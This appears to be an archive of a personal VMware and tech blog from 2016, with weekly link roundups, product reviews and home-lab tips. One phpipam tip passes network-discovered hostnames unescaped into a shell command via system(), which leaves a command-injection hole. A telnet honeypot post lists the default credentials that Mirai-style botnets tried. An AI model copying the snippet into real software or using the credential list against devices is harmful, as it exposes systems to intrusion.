--- # Evaluating 2016 URL: https://vNinja.net/misc/evaluating-2016/ Date: 2016-12-25 Author: christian Tags: 2016, Review Back in February 2016 I published my goals for 2016, and it’s time to review that list: Shake things up a bit – Go big or go home. This one is easy, in April 2016 I moved from EVRY to Proact, with a clear mission statement: Build and develop Norway’s best SDDC team. As is always the case when changing positions and companies, a lot of time is spent on getting to know the new organisation, but we’re getting there. More news on this in 2017, but things are looking good going forward. We’ve built a solid foundation in 2016! Score: 8/10 Get VCIX certified: This was a miserable failure. I sat the 3V0-622: VMware Certified Advanced Professional 6 – Data Center Virtualization Design Beta Exam in March, but failed it. It was close (I just recently got my score report!), but no cigar. Due to lots of other time consuming things going on in 2016, I’ve not had a second attempt at it yet. Score: 2/10 Keep vSoup on track: Another failure, 3 published podcasts in 2016, not even close to the monthly target. We’ve been doing the vSoup podcast since 2011, and a lot of things have changed for all three of us. Not sure how 2017 looks in that regard either. Score: 2/10 VMUG: The Norwegian VMUG is still healthy, but I haven’t been able to contribute as much as I’ve wanted in 2016, also due to time constraints. Score: 5/10 Attend an international industry conference: I did get to attend VMworld in Barcelona in 2016, which was awesome after missing out last year. Score: 10/10 Code something: Nope, not this year. Too much other stuff on my plate. I haven’t made any real code, but I’ve developed a lot of other stuff that will come in handy in 2017 (related to the top entry in this list), but nothing that really qualifies as code. Score: 0/10 So, all in all that gives me a personal score of 27 of a possible 60. Wow, that’s pretty bad.
Not quite what I had in mind for 2016, but I’m very happy that my top-most item got an 8. That one should be weighted higher than the rest anyway. Sure, I can “blame” some of the lack of progress on a few of these items on the role/employer change, but not all of it – some of it is purely a personal lack of ability to power through. 2016 has taught me a few valuable lessons: # I need to get better at planning things out, not just adding a todo item and thinking that magically makes you more productive. Having a lot of todo items doesn’t really help, unless you plan out how to accomplish them. This is one thing I aim to improve in 2017; breaking bigger tasks into smaller ones to make them manageable and attainable. Clearer focus. This ties into the previous point, but I must get better at channeling energy into the tasks at hand, not on everything all at once. Set up time slots, and use them, for the tasks that need to be done. I sleep way too little, and that needs to change drastically. Now it’s time to carve out and publish the plan for 2017. Let’s see if I’ve actually learned anything at all… --- # In The Bag #5 - Week 48 URL: https://vNinja.net/inthebag/in-the-bag-5-week-48/ Date: 2016-12-02 Author: christian Tags: InTheBag, News, Weekly Welcome to the fifth edition of In The Bag! Photo by Joshua Earle In The Bag #5 - Week 48 # Technology # Send a Tweet Directly from a VMware ESXi Host — Admittedly, sending Tweets from an ESXi host doesn’t really make much sense, but as an example of how to use the new Script Bundle feature in Auto Deploy for vSphere 6.5 it’s pretty cool — Kudos Eric Gray OPBOT - Connect VMware vSphere and Slack — Ok, this is right up my alley. Opvizor has created what they call a Virtual Assistant for vSphere. Basically this is an appliance you deploy in your environment (stripped down Debian), which lets you connect your Slack channel to your vSphere environment and then lets you issue (read only) commands to it.
Quick Look – vSphere 6.5 Storage Space Reclamation — Anthony Spiteri wrote this most excellent guide to how UNMAP works in vSphere 6.5. Once in a while (honestly, more often than you would think) someone beats me to posting something, and this is one of those times. Very glad to see automated UNMAP being re-introduced in 6.5.

Predictive DRS Walk Through — Another awesome feature made possible by the combination of vSphere 6.5 and vRealize Operations 6.4. Have a look at the video; it explains it all.

Getting Started with vRealize Automation 7 — Eric Shanks has a new course available on Pluralsight. I’ve had a quick look at this one, and it looks awesome. Definitely bookmarked for later!

Amazon Re:Invent New Products and Services — Wow, lots and lots of new interesting AWS things to play with. To be honest I haven’t looked at it all yet, but this is quite the list.

Other #

Recommended Reading — Justin Warren has a list of his recommended books and essays, covering a wide variety of topics. Well worth checking out!

Life Gets (a Lot) Better When You Stop Giving a F*ck — The title pretty much says it all; do yourself a favour and spend 5 minutes reading Thomas Oppong’s article.

More young people are watching Planet Earth 2 than The X Factor — There is hope after all!

That’s it for this week, a new one is in the works for next Friday.

--- # In The Bag #4 - Week 47 URL: https://vNinja.net/inthebag/in-the-bag-4-week-47/ Date: 2016-11-25 Author: christian Tags: InTheBag, News, Weekly

Welcome to the fourth edition of In The Bag! Photo by Sonny Abesamis

In The Bag #4 - Week 47 Technology #

Capacity Expansion & Disk Group Design Decisions–All Flash vSAN — Every design decision has a consequence, and that’s also the case when it comes to vSAN. Jason Langer has written a great article highlighting how enabling deduplication and compression has consequences for drive failure scenarios.
Veeam Backup & Replication and vSAN integration deep dive — Great deep dive by Luca into how Veeam B&R integrates with vSAN and uses that tight integration to speed up backups and minimise network traffic in the process.

vGhetto Automated vSphere Lab Deployment for vSphere 6.0u2 & vSphere 6.5 — William has yet again knocked it out of the park, this time by creating a PowerCLI script that rolls out nested ESXi environments with vSAN like there is no tomorrow. Much love for this; I’ve already run it a few times in my own lab environment.

Other #

The Fascinating Science Behind ‘Talking’ With Your Hands — I admit it, and everyone who has ever seen me do a presentation or talk can verify it: I’m a “hand-talker”, and this is also why I hate using hand-held microphones. I forget, and move my hands all over the place.

Tiny Desk: how NPR’s intimate concert series earned a cult following — There is something about live, raw, not overproduced music that appeals to me. The Tiny Desk recordings are fun, quirky, and sometimes you can even spot that the artists get it wrong. Great stuff. I particularly like the set played by Death Cab for Cutie.

The Most Influential Images of All Time — Time has created a list of what they think are the most influential images of all time, and it’s a great one. A bunch of these are really interesting, both from a historic perspective and from a photography one.

Special #

This week I’ve decided to add a new section. This “Special” section will sometimes pop up, pretty randomly, if there is something in particular that caught my attention that week. Safe to say, this week there was. Lars Trøen, one of the longest “serving” vExperts, fellow Norwegian and all-around good guy, recorded a video expressing his undying love for VMware Workstation.
So here he is, in all his glory: That’s it for this week, a new one is in the works for next Friday.

--- # macOS: Spectacle URL: https://vNinja.net/osx/macos-spectacle/ Date: 2016-11-24 Author: christian Tags: macOS, Recommended, Spectacle

Working with the keyboard to move, resize, focus and arrange your applications is a great productivity tip. When I changed from Windows to macOS a few years ago, I had a pretty convoluted setup based on Slate for managing keyboard shortcuts, especially for moving applications around, but this has since been simplified by using Spectacle instead of Slate. Spectacle has everything I need, especially keyboard shortcuts for maximising an application, or “flinging” it over to another display. Spectacle is free and comes highly recommended, give it a try!

--- # Facelift URL: https://vNinja.net/news/facelift/ Date: 2016-11-24 Author: christian Tags: Facelift, Theme, Wordpress

I have given the site a small facelift, replacing the old theme with a new and cleaner version. For some reason, I get this “theme itch” a couple of times a year, but usually I manage to let it pass without making many changes. This time it stuck with me though, and I ended up replacing the old theme with a new one. In fact, the old theme had been active for close to two years now, so it was time to shake things up a bit anyway. The new theme gives the site a fresh and, in my opinion, better look. The double menus in the header make it look more organised and less cluttered, and the static navigation header is something I’ve wanted to have for a long time now. It just looks simpler and cleaner, especially with regards to font faces and sizes.

Simplicity is the ultimate sophistication. — Leonardo da Vinci

If you come across anything that looks weird or out of place, please let me know!

--- # Got VMware vRealize Log Insight?
URL: https://vNinja.net/virtualization/got-vmware-vrealize-log-insight/ Date: 2016-11-23 Author: christian Tags: Free, Log Insight, Software, VMware

Recent conversations with existing and potential clients made me realize that many are not aware that they most likely are entitled to use VMware vRealize Log Insight in their environment. For free. Back in March 2016 VMware announced that everyone with a valid VMware vCenter license is also entitled to a 25-OSI pack of vRealize Log Insight for vCenter Server. This means that you can gather logs for up to 25 ESXi hosts, VMs or other devices in your environment. It even allows you to use the following VMware content packs (3rd party content packs require a full Log Insight license):

Horizon View
NSX
OpenStack
vCenter Operations Manager
vCloud Automation Center
vCloud Director
vCNS
Virtual SAN
vRealize Automation
vRealize Operations Manager
vSphere

This should be a no-brainer for everyone with a VMware vSphere environment of up to 24 hosts; the value that vRealize Log Insight provides is enormous, especially when it comes to troubleshooting. Why 24 when you get a 25-pack, you may ask? Well, you’ll want to use one of them for vCenter itself, leaving 24 for your ESXi hosts. If your environment is smaller than 24 hosts, the remaining OSIs can be used to monitor just about anything that can log to a syslog service, like switches, routers and other devices. Credits: gratisography.com

So, if you’re not running it already, log on to my.vmware.com and download it today — you can then use your existing vCenter license to activate it. You’ll be drinking from the log-hose in no time.

--- # VMware vSAN: 2016 Edition URL: https://vNinja.net/virtualization/vmware-vsan-2016-edition/ Date: 2016-11-23 Author: christian Tags: storage, VMware, VSAN

Both in 2014 and in 2015 I wrote pieces on the current status of VMware vSAN, and it’s time to revisit it for 2016.
My previous posts: 2014: VSAN: The Unspoken Future 2015: VMware VSAN: More than meets the eye.

vSAN 6.5 was released with vSphere 6.5, and brings a few new features to the table:

Virtual SAN iSCSI Target Service
Support for Cloud Native Apps running on the Photon Platform
REST APIs and Enhanced PowerCLI support
2-Node Direct Connect
Witness Traffic Separation for ROBO
All-Flash support in the standard license (deduplication and compression still need Advanced or Enterprise)
512e drive support

In my opinion, the first three items on that list are the most interesting. Back in 2015 I talked about VMware turning vSAN into a generic storage platform, and the new Virtual SAN iSCSI Target Service is a step in that direction. This new feature allows you to share vSAN storage directly to physical servers over iSCSI (VMware is not positioning this as a replacement for ordinary iSCSI SAN arrays), without having to do that through iSCSI targets running inside a VM. The same goes for Cloud Native Apps support, where new applications can talk with vSAN directly through the API, even without a vCenter! Both of these bypass the VM layer entirely, and provide external connectivity into the core vSAN storage layer. Clearly these are the first steps towards opening up vSAN for external usage; expect to see more interfaces being exposed externally in future releases. An object store resembling Amazon S3 doesn’t sound too far-fetched, does it? Perhaps even with back-end replication and archiving built in. Stick your files in a vSAN and let the policies there determine which objects should be stored locally, and which should be stored on S3? Or which should be replicated to another vSAN cluster, located somewhere else? Being able to use SPBM for more than VM objects is a good idea, and it makes those non-VM workloads running in your vSAN cluster easier to monitor and manage.
Sure, the rest of the items on the list are nice too. The 2-Node Direct Connect feature allows you to connect two nodes without the need for external 10 GbE switches, cutting costs in those scenarios. All-Flash support on all license levels is also nice, but as is the case with 512e drive support, it’s natural progression. With the current price point of flash devices, the vSAN Hybrid model is not going to get used much going forward. All in all, the vSAN 6.5 release is a natural evolution of a storage product that’s still in its infancy. That’s the beauty of SDS: new features like this can be made available without having to wait for a hardware refresh.

--- # Cohesity: My Initial Impression URL: https://vNinja.net/virtualization/cohesity-my-initial-impression/ Date: 2016-11-22 Author: christian Tags: Backup, Cohesity, storage

A few weeks back Cohesity gave me access to a lab environment, where I could play around with their HyperConverged Secondary Data solution. For those unaware of what their offering entails, it’s, simply put, a solution for managing secondary storage. In this case, secondary storage is really everything that isn’t mission critical. It can be your backups, test/dev workloads, file shares and so on. The idea is to place these unstructured data sets on a secondary storage platform to ease management and analytics, while at the same time keeping them integrated with the rest of the existing environment. It’s a distributed scale-out platform, with a pay-as-you-grow model. Currently Cohesity supports both SMB and NFS as data entry points, and it also supports acting as a front-end for Google Cloud Storage Nearline, Microsoft Azure, Amazon S3 and Glacier.

Partial Feature List # I won’t go through a complete feature list for the current v3.0 offering, but here are a few highlights:

Replication between Cohesity Clusters
Physical Windows and Linux support (in addition to VMs)
Single object restore for MS SQL, MS SharePoint and MS Exchange
Archival of data to Azure, Amazon, Google
Tape support
Data Analytics

Getting data out of your VMs, and onto a secondary storage tier, makes sense, even more so when you can replicate that data out of your datacenter as well. This makes your VMs smaller and thus easier to manage. Naturally I was most interested in looking at this from a vSphere perspective, and that’s what I had a look at in the lab. Backups and Clones are presented back to the vSphere environment using NFS, something that enables quick restores and cloning without massive data transfers to get started. Without any introduction to the product whatsoever I was able to create Protection Jobs (backups) and clone VMs directly from the Cohesity interface.

Creating Protection Jobs: # Creating a Protection Job is easy: select the VMs you want to protect from the infrastructure, select or create a Protection Policy (did I mention it’s policy driven?), and watch the backups run.

Creating Clones # The procedure for clone jobs is equally simple. The Cohesity 3.0 UI is beautiful and easy to work with. As I mentioned in my tweet after looking at this for a little under an hour: Been playing around with @cohesity this evening. First impression: not bad guys, not bad at all. — Christian Mohn™ (@h0bbel) November 5, 2016

It’ll be interesting to see where this goes from here, but from a purely technical point of view the current offering looks pretty darn good! Of course, I’ve only scratched the surface here, playing with backup/restore and cloning only; the platform has much more to offer besides that.

--- # Nordic VMUG UserCon 2016 URL: https://vNinja.net/news/nordic-vmug-usercon-2016/ Date: 2016-11-19 Author: christian Tags: Nordic, UserCon, vDM30in30, VMUG

The 2016 Nordic VMUG UserCon in Copenhagen, Denmark, is just 11 days away, and if you haven’t registered already now is the time to do so.
As usual the speaker lineup for the event is awesome, with a lot of the usual suspects like Duncan Epping (VMware), Cormac Hogan (VMware), Lee Dilworth (VMware), and Frank Denneman (VMware), but VMware is also showing its commitment to VMUG by sending some non-Europeans as well, like Grant Orchard and Mike Foley. This, coupled with “local” speakers like Michael Ryom, Nicolai Sandager and Marteinn Sigurdsson, promises to make it every bit as awesome as the event was last year. I was lucky enough to attend last year, and I even had a speaker slot. To be honest, I had submitted (and gotten approval for) a session this year as well, but ultimately I’ll be unable to attend due to circumstances out of my control. Sadly there isn’t anything I can do about that, as I would have loved to be there again. I’m really bummed out that I won’t be able to see Simon Eady’s Building Self Healing Environments with vRealize Operations Manager session! Have a look at the agenda, and register today. Join 400 of your peers at the event to attend in the Nordics this year! Again, big kudos to the Danish VMUG team, who put this together every year. You’re doing an awesome job organising this!

--- # In The Bag #3 - Week 46 URL: https://vNinja.net/virtualization/in-the-bag-3-week-46/ Date: 2016-11-18 Author: christian Tags: InTheBag, News, vDM30in30

Welcome to the third edition of In The Bag! Photo by Sonny Abesamis

In The Bag #3 - Week 46 Technology #

Slow news week, not much happening really. Oh wait, there was this thing called vSphere 6.5 that was released. William Lam has the lowdown in his All vSphere 6.5 release notes & download links post. Please read the release notes. They are important.

Veeam Availability Suite 9.5 was released too. No vSphere 6.5 support as of yet, so if you depend on Veeam Backup and Replication for your backup needs it’s best to wait a bit.
How the Top vBlogs are performing (or how to optimize your WordPress site) — Eric Siebert has written a nice article to show how you can optimise your website and get a nice Grade A. This site needs a run through that as well, mostly due to some laziness on my part.

Regex that only matches itself — Regular expressions, or regex, scare me. I’ve never gotten to grips with them, and when someone does something like this my face goes numb and my mind goes blank.

Other #

Classic Pop Songs, Reimagined as Infographics — This is fun! How many of these song lyrics can you recognise from the infographics?

The Lost Civilization of Dial-Up Bulletin Board Systems — I grew up on Bulletin Board Systems (BBS), literally. Back in the early 90’s I even ran one of my own, with a dedicated phone line and all. Little known fact: that BBS is still up and running today!

Leonard Cohen on Kurt Cobain’s Nirvana lyric name-check: ‘I’m sorry I couldn’t have spoken to the young man’ — Yes, another Nirvana related link. Sorry (not sorry).

That’s it for this week, a new one is in the works for next Friday.

--- # VMworld Dates 2017 URL: https://vNinja.net/news/vmworld-dates-2017/ Date: 2016-11-18 Author: christian Tags: 2017, News, VMworld

Now that the seasons have changed, it’s time to look at 2017 and start planning the year. First up, when is VMworld 2017, and perhaps most importantly, where? There has been a lot of speculation about this, and perhaps the strongest rumour was that it was moving to Berlin. The details for the US have already been posted on vmworld.com, but for Europe all it says is “Fall”. According to Duncan, who usually is in the know, VMworld Europe 2017 will once again be in Barcelona, but in September instead of October. The venue is yet to be announced, so there might be a change from the Fira. Update: The venue in Barcelona has now been confirmed as Fira Gran Via, as per usual.
VMworld 2017 US: August 27 – August 31, Las Vegas | Mandalay Bay Hotel & Convention Center
VMworld 2017 Europe: September 11 – September 14, Barcelona | Fira Gran Via

So there it is, block those dates in your calendar, and start working on getting permission and funding now. Budgets for 2017 are being finalised now, so it’s probably a good idea to get your request in early.

--- # Generating Random Data in Linux URL: https://vNinja.net/virtualization/generating-random-data-in-linux/ Date: 2016-11-15 Author: christian Tags: fun, Lab, Linux, Veeam Backup & Replication, VM

I’ve been fleshing out a proper Veeam Backup & Replication demo lab at work, but doing demos on static VMs isn’t all that much fun and doesn’t really give us much. Doing scheduled backups of non-changing data is really boring. So, in order to get some changes done on the file system of a few Linux VMs running in the environment, I came up with the following solution: I set up a crontab entry that generates a file with random data in it a couple of times a day, just to make sure that there are some changes made to the VM. The crontab entry looks like this:

0 03,09,13,22 * * * head -c 1G </dev/urandom >/tmp/randomdata

This generates a 1 GB file called randomdata in /tmp, filled with content from /dev/urandom, at a couple of different times a day. This ensures that there is at least 1 GB of changes for each backup cycle, and gives Veeam Backup & Replication something to work with.

--- # In The Bag #2 - Week 45 URL: https://vNinja.net/inthebag/in-the-bag-2-week-45/ Date: 2016-11-11 Author: christian Tags: InTheBag, News, vDM30in30

Welcome to the second edition of In The Bag! Photo by Sonny Abesamis

In The Bag #2 - Week 45 Technology #

vSAN 6.5 Licensing Guide — The vSAN 6.5 Licensing Guide is now available. Worth noting is that All Flash (but not compression/dedup and RAID5/6) is now available in the Standard edition. Also nice to see that the new iSCSI Target Service is included in Standard.
Continuous Network Monitoring With Slack Alerting — You may have noticed that I’ve gone a bit mad with my own Slack channel alerting, but Jerry Gamblin has taken it even further with automated nmap scanning as well. Nice job!

The difference between VM Encryption in vSphere 6.5 and vSAN encryption — Duncan has posted this nice clarification on the differences between VM Encryption and the upcoming vSAN encryption feature (it’s in the current beta, not in the upcoming 6.5 release). This clarification was needed; these two are not the same.

Setting Up External Access To A Veeam SureBackup Virtual Lab — SureBackup is one of the finer features in Veeam Backup & Replication, and Jim Jones goes through how to configure it correctly.

GitHub for Newbies - Boston VMware User Group — Great presentation by Jonathan Frappier explaining both what Git is, and why it’s important to know it. As someone who recently did his maiden GitHub pull request, I can relate to this.

Other #

vExpert 2017 Applications are Now Open — The first round of vExpert applications for 2017 is now open, so if you want to be considered get your application in today.

Justin Parisi showed the new NetApp TechONTAP sticker 2.0 on Twitter the other day. Looks nice, but when you really look at it – well, it might not be as nice after all. Note to everyone designing stuff like this: please look at it properly. I know it’s supposed to be a headset, but once you see it differently…

BBC showed the first episode of Planet Earth II this week, and all I have to say is wow. The filming done in the first episode is just incredible! Check out Iguana vs Snakes and tell me you’re not impressed.

Canada and Denmark Fight Over Island With Whisky and Schnapps — Good times, but I’ll take the whisky any day, sorry my Danish friends.

Cyberwar — This is a TV series by Viceland; each episode goes through an aspect of cyberwarfare. So far 10 episodes have been aired, and I recommend it.
Not for the technical merit, but more for the insight into the people host Ben Makuch talks to.

That’s it for this week, a new one is in the works for next Friday.

--- # VCSA - The default choice. Always. URL: https://vNinja.net/virtualization/vcsa-the-default-choice-always/ Date: 2016-11-10 Author: christian Tags: vCenter, VCSA, vDM30in30, VMware, vSphere 6.5

I’ve been a big proponent of the VMware vCenter Appliance for a long time; I even did a talk called VCS to VCSA Converter or How a Fling Can Be Good for You! on migrating to the VCSA at the Nordic VMUG last year. The VCSA has gone through a few iterations and versions by now, coinciding with the vSphere releases.

History # Since v6.0 scaling has been on par with its Windows-based counterpart, supporting the same number of hosts and VMs. When it comes to features, VCSA 6.5 surpasses the Windows version. New tools like the Migration Tool, vCenter High Availability, Backup / Restore and the new Management Interface are all exclusively available on the VCSA. In my opinion, the most noteworthy of these are vCenter High Availability and the Backup / Restore options. vCenter High Availability addresses one of the main concerns with vCenter in general since the discontinuation of vCenter Server Heartbeat in June 2014. This new HA setup enables you to have a passive VCSA ready if your active one should fail, with the added protection of a witness that keeps track of it all. This is a native feature of the VCSA, and not available in its Windows counterpart (or little brother, as it is now…). The Backup / Restore feature is very nice as well. One of the (few) arguments I’ve heard against running the VCSA vs the Windows vCenter concerns backup. Thankfully the myth regarding image-level backups of it was debunked in v6, but the new backup / restore functionality takes that a step further. Native backup is now available in the VCSA, either via the management interface or via a public API.
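That public API makes the backup scriptable. As a rough sketch only — the endpoint path and payload shape below are my assumptions about the vSphere 6.5 appliance REST API and should be verified against the official documentation, and the host, credentials and FTP target are placeholders:

```python
# Sketch: trigger a VCSA file-based backup via the appliance REST API.
# Endpoint path and CreateSpec shape are assumptions to check against the
# vSphere API docs; host, user, password and FTP location are placeholders.
import json


def build_backup_spec(location, user, password, location_type="FTP", parts=None):
    """Build the JSON body for a backup job request."""
    return {
        "piece": {
            "location_type": location_type,   # e.g. FTP, FTPS, HTTP, HTTPS, SCP
            "location": location,             # e.g. ftp://backup.example.com/vcsa
            "location_user": user,
            "location_password": password,
            "parts": parts or ["common"],     # "common" = configuration + inventory
        }
    }


def start_backup(vcsa_host, session_id, spec):
    """POST the backup spec to the appliance (requires the 'requests' package).

    session_id comes from authenticating against the appliance first,
    e.g. POST https://<vcsa>/rest/com/vmware/cis/session with basic auth.
    """
    import requests
    resp = requests.post(
        f"https://{vcsa_host}/rest/appliance/recovery/backup/job",
        headers={"vmware-api-session-id": session_id},
        json=spec,
        verify=False,  # lab only; use proper certificate validation in production
    )
    resp.raise_for_status()
    return resp.json()


if __name__ == "__main__":
    spec = build_backup_spec("ftp://backup.example.com/vcsa", "backup", "secret")
    print(json.dumps(spec, indent=2))
```

Scheduling a script like this alongside regular image-level backups gives you both recovery options.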
The backup files (HTTP(S), FTP(S), and SCP transfer protocols are supported) make up the entire VCSA configuration, and you can restore them directly from the VCSA 6.5 ISO image in case of an emergency. This means that you can run image-level backups of the VCSA as usual, and script the backup file generation as added protection. Also worth noting is that in v6.5, VMware Update Manager has been included in the VCSA, and runs natively on the appliance. The last argument for keeping your Windows vCenter has just disappeared. With the upcoming vSphere 6.5 release it’s clear that the VCSA should be the default deployment model for a new vCenter. There is really no question about it anymore. #migrate2vcsa you should.

--- # Using GitBook for Secrets URL: https://vNinja.net/misc/using-gitbook-for-secrets/ Date: 2016-11-08 Author: christian Tags: vDM30in30

A while ago I decided to try to gather a bunch of non-public information in an easy-to-write and easy-to-consume fashion. After a bit of fiddling, and testing different potential solutions, GitBook emerged as the best option. By using Markdown as the markup language, it’s both cross-platform and easy to manage, as the content is nothing but raw text files. GitBook is awesome, no question about it, but in this case I didn’t want the content hosted publicly on gitbook.com. Thankfully, GitBook is available for download as well, so I ended up running that locally on my MacBook. For details on how to run it locally, check out Setup and Installation of GitBook. I then set up a private (free) repository on Bitbucket to host the content. So far this has been a very good experience. Writing content in Markdown is easy and quick, and running this locally makes it easy to check that the edits and additions look as expected in my browser.

$ gitbook serve dummy
Live reload server started on port: 35729
Press CTRL+C to quit ...
info: 7 plugins are installed
info: loading plugin "livereload"... OK
info: loading plugin "highlight"... OK
info: loading plugin "search"... OK
info: loading plugin "lunr"... OK
info: loading plugin "sharing"... OK
info: loading plugin "fontsettings"... OK
info: loading plugin "theme-default"... OK
info: found 13 pages
info: found 8 asset files
info: >> generation finished with success in 2.8s !
Starting server ...
Serving book on http://localhost:4000

This way I can have my browser open http://localhost:4000 on one screen, and edit the content on my second screen while the browser auto-refreshes. Once I’ve added some content I’m happy with, I push the changes back to the Bitbucket repository with my Git client. Once I’m happy with everything, GitBook makes it easy to create PDF and eBook versions for distribution. We happy.

--- # My vCenter Web Client Customization URL: https://vNinja.net/virtualization/my-vcenter-web-client-customization/ Date: 2016-11-07 Author: christian Tags:

William Lam has a repository of vCenter Web Client customizations hosted over on GitHub, and I decided to add one of my own: Botlady. Simple, but kind of fun. Photo credits go to gratisography.com. I have a couple of other ideas as well, so I might make a few more, but I’ll wait until vSphere 6.5 is released in case the formats and paths change again. After all, the new VCSA is based on VMware Photon, so things might just have moved around a bit.

--- # What's Really in the Bag? URL: https://vNinja.net/misc/whats-really-in-the-bag/ Date: 2016-11-05 Author: christian Tags: Bag, Everyday, vDM30in30

Since I “launched” my In the Bag series of weekly links yesterday, I figured I should really show what is indeed in the bag. Lifehacker runs a series called Featured Bag, and the voyeur in me finds it interesting what other people carry around, and how they organize it. This is my attempt at doing the same. This is my everyday carry; most of these items are always in the bag when I leave the house in the morning.
I’ve been using backpacks for years, but noticed I always just carry them around on my right shoulder, so I decided to go for a shoulder bag instead. For the most part this works out fine; if I’m travelling for more than a day, I tend to re-pack into one of the backpacks I have instead. The bag itself is a dbramante1928 Christiansborg, which I’m really happy with. Proper leather, and after a couple of months of usage it’s starting to show some patina.

MacBook Pro 15"
Various Apple dongles (display and ethernet) and cables
iPad Mini 4, with a Logitech Keys to Go keyboard
Arrow / EMC branded 10000 mAh external battery
Logitech R400 presenter
Old school paper notebook, with pen
Business cards
Pens
Tiny Leatherman knife/multitool
Work access card
Bose Quiet Control 25 headset

And that’s it. There is still some room for various papers etc. in the pocket on the back of the bag, and some room in the front pocket as well.

--- # In The Bag #1 - Week 44 URL: https://vNinja.net/inthebag/in-the-bag-1-week-44/ Date: 2016-11-04 Author: christian Tags:

Inspired by Scott Lowe’s Technology Short Takes, Duncan Epping’s Recommended Reads and Michael White’s Newsletter, here is my attempt at a weekly roundup of things I found interesting the last week or so. I’ve been playing with the idea of doing something like this for a while, but never really got started. Due to participating in vDM30in30 (http://discoposse.com/vdm30in30/) this year (30 posts in 30 days is a lot), I figured this was as good a time as any to get started — at least I can get 4 “free” posts out of it. Hopefully I’ll be able to keep it up and post these roundups every Friday; at least I’ll give it a good go. Naturally my focus for these will be technology and virtualization, but other random content might pop up as well. I’m still working on the format, and it’ll probably evolve as I get into a workflow. Photo by Sonny Abesamis

Anyhow, here it is, the first edition!
In The Bag #1 - Week 44 # Technology #

Why I moved from NFS to vSAN… and why it went wrong by Patrick Terlisten — A perfect example of what you need to consider when designing a vSAN environment, and what happens if you don’t.

VMware SDDC Technical Whiteboard by Jad El-Zein — Jad has made a really good whiteboard video (wow, VideoScribe looks good) on VMware SDDC. Nicely done!

vCenter Server Appliance (VCSA) 6.5 What’s New Rundown by Emad Younis — The VCSA is my preferred vCenter implementation model, and now that 6.5 is announced, it’s even more clear that the VCSA should be, and is, the default model going forward.

Designing a modern multi-tenant DC network by Myles Gray — I’m not a networking guy, but Myles has posted a whopper around designing a DC network. Very well done Myles!

Other #

Takeoff: The Oral History of Nirvana’s Crossover Moment — This is an older post (from May 2015), but I read it this week so it still qualifies. I’m still a big Nirvana fan, and I love reading stories like these.

vRockstar 2016 Pictures are online! — Pictures from this year’s vRockstar Party in Barcelona. Good times, and yeah, sorry.

That’s it for the first edition, hopefully many more to come in the next weeks and months.

--- # Adding Slack Notifications to phpipam URL: https://vNinja.net/virtualization/adding-slack-notifications-to-phpipam/ Date: 2016-11-03 Author: christian Tags:

As mentioned before, I’ve kinda turned my home lab into some sort of Slack-Ops deal, where various services in my home lab notify me of events in a private Slack channel. The latest rendition of that is adding Slack notifications from phpipam. Once phpipam detects a new device picking up an IP in my network, it notifies me like this: In order to get this working, I had to edit the /var/www/phpipam/functions/scripts/discoveryCheck.php file in phpipam. discoveryCheck.php is the script that runs when phpipam does its local subnet discovery check, so this was a natural place to add my custom curl command.
I added the following code on line 254 in that file, just below the code block that ends with $Addresses->modify_address($values);

// Log to Slack -- run custom curl command
$command = "curl -s -X POST -H \"Content-type: application/json\" --data '{\"text\":\"$values[lastSeen] - new host autodiscovered: IP: $ip Hostname: $values[dns_name]\"}' https://[WEBHOOK URL]";
system($command);

Replace [WEBHOOK URL] with your actual URL. For more details on how to set up a webhook URL, check Logging SSH logins to Slack. Pretty easy to do locally, but it would be nice if the phpipam developers could make alerting to third-party services a native feature - I’m sure there are other use cases for this as well.

--- # Running telnetlogger on my home IP URL: https://vNinja.net/virtualization/running-telnetlogger-on-my-home-ip/ Date: 2016-11-02 Author: christian Tags:

Robert Graham of erratasec has created a small honeypot tool called telnetlogger: This is a simple program to log login attempts on Telnet (port 23). It's designed to track the Mirai botnet. Right now (Oct 23, 2016) infected Mirai machines from around the world are trying to connect to Telnet on every IP address about once per minute. This program logs both which IP addresses are doing the attempts, and which passwords they are using.

For those still unaware of what the Mirai botnet is, it’s basically malware that scans for vulnerable devices with port 23 (telnet) open to the outside world, and tries to log on with known hardcoded credentials. Compromised devices have then been used to launch some of the largest DDoS attacks seen to date. For more details, check out Breaking Down Mirai: An IoT DDoS Botnet Analysis and Double-dip Internet-of-Things botnet attack felt across the Internet. Photo credit: gratisography.com. Yes, Mirai is not your grandmother’s botnet.
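telnetlogger itself is a small C program, but the core idea is tiny: listen on a TCP port and record who connects. Purely as an illustration of that concept — this is not the actual tool, it doesn’t speak the Telnet protocol or capture credentials, and it uses a configurable high port so you don’t need root to try it:

```python
# Illustrative mini "telnet logger": accept TCP connections and log the
# source address of each attempt. A concept sketch only, not Robert
# Graham's telnetlogger; use a high port (e.g. 2323) to avoid needing root.
import socket


def log_connections(port=2323, max_conns=None, log=print):
    """Listen on `port` and log each connecting peer's IP address.

    Stops after `max_conns` connections (runs forever if None).
    Returns the number of connections seen.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(16)
    seen = 0
    try:
        while max_conns is None or seen < max_conns:
            conn, (ip, _) = srv.accept()
            log(f"connection attempt from {ip}")
            conn.close()  # a real honeypot would present a login prompt here
            seen += 1
    finally:
        srv.close()
    return seen
```

Point a telnet client at the chosen port and each attempt gets logged; the real tool additionally records the username/password pairs the bots try.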
I figured it would be a nice little thing to try out, so I spun up a small Linux VM, compiled telnetlogger, ran it, and opened inbound port 23 (telnet) on my firewall at home. And guess what, it took all of 1 second before I saw the first connection attempt!

I let the honeypot service run for a few hours (about 8 or so), and here are the results, as aggregated by HoneyCredIPTracker by Daniel Miessler.

Top connection attempts, sorted by country #

```
36 TW   32 VN   28 BR   26 TR   22 IN
18 RU   14 UA   12 US   12 CN    8 PK
 8 MX    8 FR    6 TT    6 PL    6 KR
 4 TH    4 SE    4 RO    4 PY    4 MG
 4 KH    4 IR    4 GB    4 CR    4 CA
```

Top Attempted Credentials #

```
415 root xc3511      410 root vizxv       385 root admin
255 admin password   250 admin admin      240 root root
235 root 888888      215 root 123456      175 root default
170 root juantech    170 root 54321       165 support support
155 root xmhdipc     130 admin admin1234  125 guest guest
120 root Zte521      120 root 12345       115 root klv123
100 admin smcadmin    95 root anko         90 root GM8182
 90 root 1234         90 root 1111         80 root pass
 75 guest 12345
```

In the roughly 8 hours this was running, I saw a total of 15785 connection attempts - a connection attempt every 1.8 seconds, on average. I guess it’s best to close port 23 again, for good this time.

Hat tip to a former colleague of mine, security aficionado and all-around great guy Per Thorsheim for letting me know about this tool.

---

